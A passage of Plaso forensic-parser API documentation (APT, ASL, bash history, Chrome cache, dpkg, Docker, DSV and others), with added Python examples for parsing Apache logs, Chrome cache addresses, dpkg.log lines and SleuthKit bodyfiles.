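_COMMON = ' '.join([_HOST, _IDENT, _USER, _TIME, _REQUEST, _CODE, _BYTES])
_COMBINED = ' '.join([_COMMON, _REFERER, _USER_AGENT])
_VHOST_COMBINED = ' '.join([_VHOST, _COMBINED])

# Anchored at both ends, so a combined line cannot be mistaken for a common one.
LINE_FORMATS = [
    ('vhost_combined_log_format', re.compile('^' + _VHOST_COMBINED + '$')),
    ('combined_log_format', re.compile('^' + _COMBINED + '$')),
    ('common_log_format', re.compile('^' + _COMMON + '$')),
]

# Constructed sample lines: common, combined, vhost_combined and one non-Apache line.
SAMPLE_LINES = [
    '192.0.2.10 - frank [10/Oct/2000:13:55:36 -0700] "GET /apache_pb.gif HTTP/1.0" 200 2326',
    '192.0.2.10 - - [10/Oct/2000:13:55:36 -0700] "GET /login HTTP/1.1" 302 - '
    '"http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"',
    'www.example.com:443 2001:db8::1 - - [10/Oct/2000:13:55:36 -0700] '
    '"POST /api HTTP/1.1" 500 1024 "-" "curl/7.64.1"',
    'Oct 10 13:55:36 host sshd[123]: not an Apache access log line',
]


def parse_access_log_line(line):
    """Return (format_name, fields) or None when no known format matches."""
    for format_name, regex in LINE_FORMATS:
        match = regex.match(line.rstrip('\r\n'))
        if not match:
            continue
        fields = match.groupdict()
        # Apache writes "-" for an absent ident, user or byte count.
        for key in ('remote_name', 'user_name'):
            if fields[key] == '-':
                fields[key] = None
        fields['http_response_code'] = int(fields['http_response_code'])
        fields['http_response_bytes'] = (
            0 if fields['http_response_bytes'] == '-'
            else int(fields['http_response_bytes']))
        if 'port_number' in fields:
            fields['port_number'] = int(fields['port_number'])
        # "%d/%b/%Y:%H:%M:%S %z" is the default Apache %t layout; the offset is
        # honoured and the result converted to UTC so it lines up with other sources.
        local_time = datetime.strptime(fields.pop('time'), '%d/%b/%Y:%H:%M:%S %z')
        fields['timestamp_utc'] = local_time.astimezone(timezone.utc)
        return format_name, fields
    return None


def verify_structure(line):
    """Mirror of VerifyStructure: True when the line is in one of the formats."""
    return parse_access_log_line(line) is not None
```

Trying the most specific format first and anchoring every pattern with `^` and `$` is what keeps a combined line from being reported as common with its referer and user agent silently dropped.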
plaso.parsers.apt_history module
Parser for Advanced Packaging Tool (APT) History log files.
class plaso.parsers.apt_history.APTHistoryLogEventData
Bases: plaso.containers.events.EventData
APT History log event data.
command (str) – command executed.
error (str) – reported error.
packages (str) – list of packages being affected.
requester (str) – user requesting the activity.
DATA_TYPE = 'apt:history:line'
class plaso.parsers.apt_history.APTHistoryLogParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parser for Advanced Packaging Tool (APT) History log files.
DATA_FORMAT = 'Advanced Packaging Tool (APT) History log file'
LINE_STRUCTURES = [('record_start', {{{[lineEnd]... "Start-Date:"} Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} lineEnd}), ('record_body', {{"Commandline:" | "Downgrade:" | "Error:" | "Install:" | "Purge:" | "Remove:" | "Requested-By:" | "Upgrade:"} rest of line}), ('record_end', {{"End-Date:" Group:({{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)})} {lineEnd}...})]
MAX_LINE_LENGTH = 65536
NAME = 'apt_history'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a log entry.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verifies that this file is an APT History log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – single line from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.asl module
The Apple System Log (ASL) file parser.
class plaso.parsers.asl.ASLEventData
Bases: plaso.containers.events.EventData
Apple System Log (ASL) event data.
computer_name (str) – name of the host.
extra_information (str) – extra fields associated with the event.
facility (str) – facility.
group_id (int) – group identifier (GID).
level (str) – level of criticality of the event.
message_id (int) – message identifier.
message (str) – message of the event.
pid (int) – process identifier (PID).
read_uid (int) – user identifier that can read this file, where -1 represents all.
read_gid (int) – group identifier that can read this file, where -1 represents all.
record_position (int) – position of the event record.
sender (str) – sender or process that created the event.
user_sid (str) – user identifier (UID).
DATA_TYPE = 'mac:asl:event'
class plaso.parsers.asl.ASLParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Apple System Log (ASL) files.
DATA_FORMAT = 'Apple System Log (ASL) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'asl_log'
ParseFileObject(parser_mediator, file_object)
Parses an ASL file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.bash_history module
Parser for bash history files.
class plaso.parsers.bash_history.BashHistoryEventData
Bases: plaso.containers.events.EventData
Bash history log event data.
command (str) – command that was executed.
DATA_TYPE = 'bash:history:command'
class plaso.parsers.bash_history.BashHistoryParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parses events from Bash history files.
DATA_FORMAT = 'Bash history file'
LINE_STRUCTURES = [('log_entry', {{{Suppress:("#") W:(0123...)} Re:('.*?(?=($|\\n#\\d{10}))')} lineEnd})]
NAME = 'bash_history'
ParseRecord(parser_mediator, key, structure)
Parses a record and produces a Bash history event.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – elements parsed from the file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verifies that this is a bash history file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.bencode_parser module
Parser for bencoded files.
class plaso.parsers.bencode_parser.BencodeParser
Bases: plaso.parsers.interface.FileObjectParser
Parser for bencoded files.
The Plaso engine calls parsers by their Parse() method. The Parse() function deserializes bencoded files using the BitTorrent-bencode library and calls plugins (BencodePlugin) registered through the interface by their Process() method to produce event objects.
Plugins are how this parser understands the content inside a bencoded file; each plugin holds logic specific to a particular bencoded file. See the bencode_plugins/ directory for examples of how bencode plugins are implemented.
DATA_FORMAT = 'Bencoded file'
NAME = 'bencode'
ParseFileObject(parser_mediator, file_object)
Parses a bencoded file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.bsm module
Basic Security Module (BSM) event auditing file parser.
class plaso.parsers.bsm.BSMEventData
Bases: plaso.containers.events.EventData
Basic Security Module (BSM) audit event data.
event_type (int) – identifier that represents the type of the event.
extra_tokens (list[dict[str, dict[str, str]]]) – event extra tokens, a list of dictionaries of the form {token type: {token values}}.
record_length (int) – record length in bytes (trailer number).
return_value (str) – processed return value and exit status.
DATA_TYPE = 'bsm:event'
class plaso.parsers.bsm.BSMParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Basic Security Module (BSM) event auditing files.
DATA_FORMAT = 'Basic Security Module (BSM) event auditing file'
NAME = 'bsm_log'
ParseFileObject(parser_mediator, file_object)
Parses a BSM file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.chrome_cache module
Parser for Google Chrome and Chromium Cache files.
class plaso.parsers.chrome_cache.CacheAddress(cache_address)
Bases: object
Chrome cache address.
block_number (int) – block data file number.
block_offset (int) – offset within the block data file.
block_size (int) – block size.
filename (str) – name of the block data file.
value (int) – cache address.
FILE_TYPE_BLOCK_1024 = 3
FILE_TYPE_BLOCK_256 = 2
FILE_TYPE_BLOCK_4096 = 4
FILE_TYPE_BLOCK_RANKINGS = 1
FILE_TYPE_SEPARATE = 0
class plaso.parsers.chrome_cache.CacheEntry
Bases: object
Chrome cache entry.
creation_time (int) – creation time, in number of microseconds since January 1, 1601, 00:00:00 UTC.
hash (int) – super fast hash of the key.
key (bytes) – key.
next (int) – cache address of the next cache entry.
original_url (str) – original URL derived from the key.
rankings_node (int) – cache address of the rankings node.
class plaso.parsers.chrome_cache.ChromeCacheDataBlockFileParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Chrome cache data block file parser.
ParseCacheEntry(file_object, block_offset)
Parses a cache entry.
Parameters
• file_object (dfvfs.FileIO) – a file-like object to read from.
• block_offset (int) – block offset of the cache entry.
Returns cache entry.
Return type CacheEntry
Raises ParseError – if the cache entry cannot be read.
ParseFileObject(parser_mediator, file_object)
Parses a file-like object.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises ParseError – when the file cannot be parsed.
class plaso.parsers.chrome_cache.ChromeCacheEntryEventData
Bases: plaso.containers.events.EventData
Chrome Cache event data.
original_url (str) – original URL.
DATA_TYPE = 'chrome:cache:entry'
class plaso.parsers.chrome_cache.ChromeCacheIndexFileParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Chrome cache index file parser.
creation_time (int) – creation time, in number of microseconds since January 1, 1601, 00:00:00 UTC.
index_table (list[CacheAddress]) – the cache addresses which are stored in the index file.
ParseFileObject(parser_mediator, file_object)
Parses a file-like object.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises ParseError – when the file cannot be parsed.
class plaso.parsers.chrome_cache.ChromeCacheParser
Bases: plaso.parsers.interface.FileEntryParser
Parses Chrome Cache files.
DATA_FORMAT = 'Google Chrome or Chromium Cache file'
NAME = 'chrome_cache'
ParseFileEntry(parser_mediator, file_entry)
Parses Chrome Cache files.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_entry (dfvfs.FileEntry) – file entry.
Raises UnableToParseFile – when the file cannot be parsed.
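The CacheAddress fields listed above (file type, block data file name, block number, block size and offset) are all packed into one 32-bit cache address, and CacheEntry.creation_time is a microsecond count from 1601. The following is an added example, not Plaso's own code, that decodes such an address and converts the timestamp; the bit layout is the one Chromium's blockfile disk cache uses (net/disk_cache/blockfile/addr.h), the 8192-byte block file header and the per-type block sizes come from the same format, and the sample address values are constructed for the example.

```python
"""Added example, not Plaso's own code: decode a Chrome cache address into the
CacheAddress fields listed above (file type, block data file name, block
number, block size and offset) and convert a CacheEntry.creation_time value to
a datetime. The bit layout is the one Chromium's blockfile disk cache uses
(net/disk_cache/blockfile/addr.h); sample address values are constructed."""
from datetime import datetime, timedelta, timezone

FILE_TYPE_SEPARATE = 0
FILE_TYPE_BLOCK_RANKINGS = 1
FILE_TYPE_BLOCK_256 = 2
FILE_TYPE_BLOCK_1024 = 3
FILE_TYPE_BLOCK_4096 = 4

# Bytes per block in each block data file type (rankings blocks are 36 bytes).
_BLOCK_SIZES = {
    FILE_TYPE_BLOCK_RANKINGS: 36,
    FILE_TYPE_BLOCK_256: 256,
    FILE_TYPE_BLOCK_1024: 1024,
    FILE_TYPE_BLOCK_4096: 4096,
}
# Each block data file (data_0, data_1, ...) starts with a fixed-size header.
_BLOCK_FILE_HEADER_SIZE = 8192


def decode_cache_address(value):
    """Return the decoded fields as a dict, or None for the unused address 0.

    Layout of the 32-bit value:
      bit 31      initialized flag
      bits 28-30  file type (FILE_TYPE_* above)
      bits 24-25  number of contiguous blocks minus one (block files only)
      bits 16-23  block data file number (block files only)
      bits 0-15   first block number (block files only)
      bits 0-27   file number of a separate f_XXXXXX file (separate files)
    """
    if value == 0:
        return None
    file_type = (value & 0x70000000) >> 28
    decoded = {
        'value': value,
        'is_initialized': bool(value & 0x80000000),
        'file_type': file_type,
    }
    if file_type == FILE_TYPE_SEPARATE:
        decoded['filename'] = 'f_{0:06x}'.format(value & 0x0fffffff)
        return decoded
    if file_type not in _BLOCK_SIZES:
        raise ValueError('unsupported cache address file type: {0:d}'.format(file_type))
    block_size = _BLOCK_SIZES[file_type]
    number_of_blocks = ((value & 0x03000000) >> 24) + 1
    block_number = value & 0x0000ffff
    decoded['filename'] = 'data_{0:d}'.format((value & 0x00ff0000) >> 16)
    decoded['block_number'] = block_number
    decoded['block_size'] = number_of_blocks * block_size
    decoded['block_offset'] = _BLOCK_FILE_HEADER_SIZE + block_number * block_size
    return decoded


def cache_time_to_datetime(microseconds):
    """Convert a creation_time (microseconds since 1601-01-01 00:00:00 UTC) to a datetime."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(microseconds=microseconds)


# Constructed sample addresses: a single 256-byte block in data_1, two
# 1024-byte blocks in data_2, and an entry stored in a separate f_ file.
SAMPLE_ADDRESSES = [0xa0010003, 0xb1020010, 0x8000002a]
```

The block_offset is what ParseCacheEntry above takes as its second argument; an address whose offset or block count points past the end of the data file is the kind of inconsistency that should be reported rather than read blindly.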
plaso.parsers.chrome_preferences module
A parser for the Chrome preferences file.
class plaso.parsers.chrome_preferences.ChromeContentSettingsExceptionsEventData
Bases: plaso.containers.events.EventData
Chrome content settings exceptions event data.
permission (str) – permission.
primary_url (str) – primary URL.
secondary_url (str) – secondary URL.
DATA_TYPE = 'chrome:preferences:content_settings:exceptions'
class plaso.parsers.chrome_preferences.ChromeExtensionInstallationEventData
Bases: plaso.containers.events.EventData
Chrome Extension event data.
extension_id (str) – extension identifier.
extension_name (str) – extension name.
path (str) – path.
DATA_TYPE = 'chrome:preferences:extension_installation'
class plaso.parsers.chrome_preferences.ChromeExtensionsAutoupdaterEventData
Bases: plaso.containers.events.EventData
Chrome Extension Autoupdater event data.
message (str) – message.
DATA_TYPE = 'chrome:preferences:extensions_autoupdater'
class plaso.parsers.chrome_preferences.ChromePreferencesClearHistoryEventData
Bases: plaso.containers.events.EventData
Chrome history clearing event data.
message (str) – message.
DATA_TYPE = 'chrome:preferences:clear_history'
class plaso.parsers.chrome_preferences.ChromePreferencesParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Chrome Preferences files.
DATA_FORMAT = 'Google Chrome Preferences file'
NAME = 'chrome_preferences'
ParseFileObject(parser_mediator, file_object)
Parses a Chrome preferences file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
REQUIRED_KEYS = frozenset({'browser', 'extensions'})
plaso.parsers.cups_ipp module
The CUPS IPP files parser.
CUPS IPP version 1.0:
• https://tools.ietf.org/html/rfc2565
• https://tools.ietf.org/html/rfc2566
• https://tools.ietf.org/html/rfc2567
• https://tools.ietf.org/html/rfc2568
• https://tools.ietf.org/html/rfc2569
• https://tools.ietf.org/html/rfc2639
CUPS IPP version 1.1:
• https://tools.ietf.org/html/rfc2910
• https://tools.ietf.org/html/rfc2911
• https://tools.ietf.org/html/rfc3196
• https://tools.ietf.org/html/rfc3510
CUPS IPP version 2.0:
• N/A
class plaso.parsers.cups_ipp.CupsIppEventData
Bases: plaso.containers.events.EventData
CUPS IPP event data.
application (str) – application that prints the document.
computer_name (str) – name of the computer.
copies (int) – number of copies.
doc_type (str) – type of document.
job_id (str) – job identifier.
job_name (str) – job name.
owner (str) – real name of the user.
printer_id (str) – identification name of the printer.
uri (str) – URL of the CUPS service.
user (str) – system user name.
DATA_TYPE = 'cups:ipp:event'
class plaso.parsers.cups_ipp.CupsIppParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for CUPS IPP files.
DATA_FORMAT = 'CUPS IPP file'
NAME = 'cups_ipp'
ParseFileObject(parser_mediator, file_object)
Parses a CUPS IPP file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.custom_destinations module
Parser for custom destinations jump list (.customDestinations-ms) files.
class plaso.parsers.custom_destinations.CustomDestinationsParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses custom destinations jump list (.customDestinations-ms) files.
DATA_FORMAT = 'Custom destinations jump list (.customDestinations-ms) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'custom_destinations'
ParseFileObject(parser_mediator, file_object)
Parses a .customDestinations-ms file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.czip module
This file contains a parser for compound ZIP files.
class plaso.parsers.czip.CompoundZIPParser
Bases: plaso.parsers.interface.FileObjectParser
Shared functionality for parsing compound zip files.
Compound zip files are zip files used as containers to create another file format, as opposed to archives of unrelated files.
DATA_FORMAT = 'Compound ZIP file'
NAME = 'czip'
ParseFileObject(parser_mediator, file_object)
Parses a compound ZIP file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.docker module
Parser for Docker configuration and log files.
class plaso.parsers.docker.DockerJSONContainerEventData
Bases: plaso.containers.events.EventData
Docker container configuration event data.
action (str) – whether the container was created, started, or finished.
container_id (str) – identifier of the container (SHA256).
container_name (str) – name of the container.
DATA_TYPE = 'docker:json:container'
class plaso.parsers.docker.DockerJSONContainerLogEventData
Bases: plaso.containers.events.EventData
Docker container's log event data.
container_id (str) – identifier of the container (SHA256).
log_line (str) – log line.
log_source (str) – log source.
DATA_TYPE = 'docker:json:container:log'
class plaso.parsers.docker.DockerJSONLayerEventData
Bases: plaso.containers.events.EventData
Docker file system layer configuration event data.
command – the command which made Docker create a new layer.
layer_id – the identifier of the current Docker layer (SHA-1).
DATA_TYPE = 'docker:json:layer'
class plaso.parsers.docker.DockerJSONParser
Bases: plaso.parsers.interface.FileObjectParser
Parser for Docker JSON configuration and log files.
This handles:
• per container config file: DOCKER_DIR/containers/<container_id>/config.json
• per container stdout/stderr output log: DOCKER_DIR/containers/<container_id>/<container_id>-json.log
• file system layer config files: DOCKER_DIR/graph/<layer_id>/json
DATA_FORMAT = 'Docker configuration and log JSON file'
NAME = 'dockerjson'
ParseFileObject(parser_mediator, file_object)
Parses various Docker configuration and log files in JSON format.
This method checks whether the file_object points to a Docker JSON config or log file, and calls the corresponding _Parse* function to generate events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises
• UnableToParseFile – when the file cannot be parsed.
• ValueError – if the JSON file cannot be decoded.
plaso.parsers.dpkg module
Parser for Debian package manager log (dpkg.log) files.
Information updated 02 September 2016.
An example:
2016-08-03 15:25:53 install base-passwd:amd64 <none> 3.5.33
Log messages are of the form:
YYYY-MM-DD HH:MM:SS startup type command
where type is archives (with a command of unpack or install) or packages (with a command of configure, triggers-only, remove or purge).
YYYY-MM-DD HH:MM:SS status state pkg installed-version
YYYY-MM-DD HH:MM:SS action pkg installed-version available-version
where action is install, upgrade, configure, trigproc, disappear, remove or purge.
YYYY-MM-DD HH:MM:SS conffile filename decision
where decision is install or keep.
class plaso.parsers.dpkg.DpkgEventData
Bases: plaso.containers.events.EventData
Dpkg event data.
body (str) – body of the log line.
DATA_TYPE = 'dpkg:line'
class plaso.parsers.dpkg.DpkgParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parser for Debian package manager log (dpkg.log) files.
DATA_FORMAT = 'Debian package manager log (dpkg.log) file'
LINE_STRUCTURES = [('line', {Group:({{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) {Combine:({{"startup" archives | packages} unpack | install | configure | triggers-only | remove | purge}) | Combine:({{{"status" W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{{install | upgrade | configure | trigproc | disappear | remove | purge W:(0123...)} W:(0123...)} W:(0123...)}) | Combine:({{"conffile" W:(0123...)} install | keep})}})]
NAME = 'dpkg'
ParseRecord(parser_mediator, key, structure)
Parses a structure of tokens derived from a line of a text file.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, line)
Verifies if a line from a text file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• line (str) – line from a text file.
Returns True if the line is in the expected format, False if not.
Return type bool
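The four dpkg.log record forms described in the module docstring above (startup, status, action and conffile) can each be matched with one anchored regular expression. The following is an added example, not Plaso's own code: it classifies a line, splits it into fields with a datetime timestamp and the DpkgEventData-style body, and groups package names by action, which is the question an analyst usually asks of this log (what was installed, upgraded or removed, and when). The install line is the one quoted on the page; the other sample lines are constructed, and the function and constant names are the example's own.

```python
"""Added example, not Plaso's own code: classify dpkg.log lines into the four
record forms documented above (startup, status, action and conffile), split
them into fields and group package names by action. The install line is the
one quoted above; the other sample lines are constructed."""
import re
from datetime import datetime

_TIMESTAMP = r'(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2})'
_STARTUP_TYPES = r'archives|packages'
_STARTUP_COMMANDS = r'unpack|install|configure|triggers-only|remove|purge'
_ACTIONS = r'install|upgrade|configure|trigproc|disappear|remove|purge'

# One anchored regex per documented record form; tried in order.
RECORD_FORMS = [
    ('startup', re.compile(
        _TIMESTAMP + r' startup (?P<type>' + _STARTUP_TYPES + r') '
        r'(?P<command>' + _STARTUP_COMMANDS + r')$')),
    ('status', re.compile(
        _TIMESTAMP + r' status (?P<state>\S+) (?P<package>\S+) '
        r'(?P<installed_version>\S+)$')),
    ('action', re.compile(
        _TIMESTAMP + r' (?P<action>' + _ACTIONS + r') (?P<package>\S+) '
        r'(?P<installed_version>\S+) (?P<available_version>\S+)$')),
    ('conffile', re.compile(
        _TIMESTAMP + r' conffile (?P<filename>\S+) (?P<decision>install|keep)$')),
]

# Sample lines: the install line is the one quoted above, the rest are constructed,
# and the last one is a syslog line that VerifyStructure would reject.
SAMPLE_LINES = [
    '2016-08-03 15:25:53 startup archives unpack',
    '2016-08-03 15:25:53 install base-passwd:amd64 <none> 3.5.33',
    '2016-08-03 15:25:54 status half-installed base-passwd:amd64 3.5.33',
    '2016-08-03 15:25:55 conffile /etc/ssh/sshd_config keep',
    'Aug  3 15:25:55 host dpkg: not a dpkg.log line',
]


def parse_dpkg_line(line):
    """Return (form, fields) with a datetime timestamp and the DpkgEventData-style
    body, or None for a line in none of the documented forms."""
    line = line.rstrip('\r\n')
    for form, regex in RECORD_FORMS:
        match = regex.match(line)
        if not match:
            continue
        fields = match.groupdict()
        fields['timestamp'] = datetime.strptime(
            fields.pop('date') + ' ' + fields.pop('time'), '%Y-%m-%d %H:%M:%S')
        # Everything after "YYYY-MM-DD HH:MM:SS " (20 characters) is the body.
        fields['body'] = line[20:]
        return form, fields
    return None


def packages_by_action(lines):
    """Group package names by dpkg action (install, upgrade, remove, ...)
    so unexpected package changes stand out on a host timeline."""
    result = {}
    for line in lines:
        parsed = parse_dpkg_line(line)
        if parsed is not None and parsed[0] == 'action':
            fields = parsed[1]
            result.setdefault(fields['action'], []).append(fields['package'])
    return result
```

The timestamps in dpkg.log carry no zone information, so the datetime returned here is naive; the host's configured time zone has to be applied before these events are merged with sources that record UTC.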
plaso.parsers.dsv_parser module
Delimiter separated values (DSV) parser interface.
class plaso.parsers.dsv_parser.DSVParser(encoding=None)Bases: plaso.parsers.interface.FileObjectParser
Delimiter separated values (DSV) parser interface.
COLUMNS = []
DELIMITER = ','
ESCAPE_CHARACTER = ''
FIELD_SIZE_LIMIT = 131072
classmethod GetFormatSpecification()Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NUMBER_OF_HEADER_LINES = 0
ParseFileObject(parser_mediator, file_object)
Parses a DSV text file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
abstract ParseRow(parser_mediator, row_offset, row)
Parses a line of the log file and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row_offset (int) – offset of the row.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
QUOTE_CHAR = '"'
abstract VerifyRow(parser_mediator, row)
Verifies if a line of the file is in the expected format.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• row (dict[str, str]) – fields of a single row, as specified in COLUMNS.
Returns True if this is the correct parser, False otherwise.
Return type bool
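The DSVParser contract above (COLUMNS, DELIMITER, QUOTE_CHAR, ESCAPE_CHARACTER, NUMBER_OF_HEADER_LINES, VerifyRow to recognise the format, ParseRow to turn a row into events) is easiest to see on a concrete format. The following is an added example, not plaso's DSVParser or its MactimeParser: a stand-alone parser for the SleuthKit bodyfile layout that MactimeParser later on this page declares in its COLUMNS, with the same '|' delimiter and '\\' escape character. The BodyfileDSVParser, DSVParserError, ParseBodyfile and IsBodyfile names, the event dictionaries and the sample bodyfile lines are all constructed for this illustration.

```python
import csv
import io


class DSVParserError(Exception):
    """Raised when the input does not look like the expected DSV format."""


class BodyfileDSVParser:
    """Hypothetical DSV parser for SleuthKit bodyfiles, written against the
    interface described above; it is not plaso's DSVParser or MactimeParser."""

    # Column layout of a SleuthKit version 3 bodyfile.
    COLUMNS = ['md5', 'name', 'inode', 'mode_as_string', 'uid', 'gid', 'size',
               'atime', 'mtime', 'ctime', 'btime']
    DELIMITER = '|'
    ESCAPE_CHARACTER = '\\'
    QUOTE_CHAR = '"'
    NUMBER_OF_HEADER_LINES = 0
    FIELD_SIZE_LIMIT = 131072

    _TIMESTAMP_COLUMNS = ('atime', 'mtime', 'ctime', 'btime')

    def VerifyRow(self, row):
        """Returns True if the row has the expected shape: every column present,
        no surplus columns, and the four timestamps and the size are non-negative
        integers (bodyfile timestamps are POSIX seconds)."""
        if any(row.get(column) is None for column in self.COLUMNS):
            return False
        if None in row:  # csv.DictReader stores surplus fields under the key None
            return False
        return all(row[column].isdigit()
                   for column in self._TIMESTAMP_COLUMNS + ('size',))

    def ParseRow(self, row_number, row):
        """Turns one bodyfile row into one event per timestamp. A bodyfile
        records 0 for a timestamp that is not set; those produce no event."""
        events = []
        for column in self._TIMESTAMP_COLUMNS:
            timestamp = int(row[column])
            if timestamp == 0:
                continue
            events.append({
                'timestamp': timestamp,
                'timestamp_desc': column,
                'filename': row['name'],
                'inode': row['inode'],
                'mode_as_string': row['mode_as_string'],
                'size': int(row['size']),
                'row_number': row_number,
            })
        return events

    def ReadRows(self, file_object):
        """Returns an iterator of row dicts over a binary file-like object."""
        csv.field_size_limit(self.FIELD_SIZE_LIMIT)
        text = io.TextIOWrapper(file_object, encoding='utf-8', newline='')
        reader = csv.DictReader(
            text, fieldnames=self.COLUMNS, delimiter=self.DELIMITER,
            quotechar=self.QUOTE_CHAR, escapechar=self.ESCAPE_CHARACTER)
        for _ in range(self.NUMBER_OF_HEADER_LINES):
            next(reader, None)
        return reader

    def ParseFileObject(self, file_object):
        """Parses a binary file-like object and returns (events, skipped_rows).
        The first row must pass VerifyRow, otherwise DSVParserError is raised,
        mirroring how a parser declines a file it does not recognise; later
        malformed rows are skipped and their row numbers reported."""
        events = []
        skipped = []
        for row_number, row in enumerate(self.ReadRows(file_object), 1):
            if not self.VerifyRow(row):
                if row_number == 1:
                    raise DSVParserError('first row is not a bodyfile row')
                skipped.append(row_number)
                continue
            events.extend(self.ParseRow(row_number, row))
        if not events and not skipped:
            raise DSVParserError('no rows found')
        return events, skipped


def ParseBodyfile(data):
    """Parses bodyfile bytes and returns (events, skipped_rows)."""
    return BodyfileDSVParser().ParseFileObject(io.BytesIO(data))


def IsBodyfile(data):
    """Returns True if the first row verifies as a bodyfile row."""
    parser = BodyfileDSVParser()
    first_row = next(parser.ReadRows(io.BytesIO(data)), None)
    return first_row is not None and parser.VerifyRow(first_row)


# Constructed sample bodyfile: two entries, the first without a birth time.
SAMPLE_BODYFILE = b'\n'.join([
    b'0|/etc/passwd|131089|-rw-r--r--|0|0|1832|1600000000|1590000000|1590000000|0',
    b'0|/home/user/.bash_history|262161|-rw-------|1000|1000|4096|'
    b'1600000100|1600000050|1600000050|1599999000',
]) + b'\n'

if __name__ == '__main__':
    for event in ParseBodyfile(SAMPLE_BODYFILE)[0]:
        print(event['timestamp'], event['timestamp_desc'], event['filename'])
```

VerifyRow is deliberately strict: a bodyfile produced by another tool with extra or missing columns fails on the first row and the whole file is declined, which is the behaviour a practitioner wants from format detection rather than a partial, silently wrong timeline.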
plaso.parsers.dtfabric_parser module
Shared functionality for dtFabric-based data format parsers.
class plaso.parsers.dtfabric_parser.DtFabricBaseParser
Bases: plaso.parsers.interface.FileObjectParser
Shared functionality for dtFabric-based data format parsers.
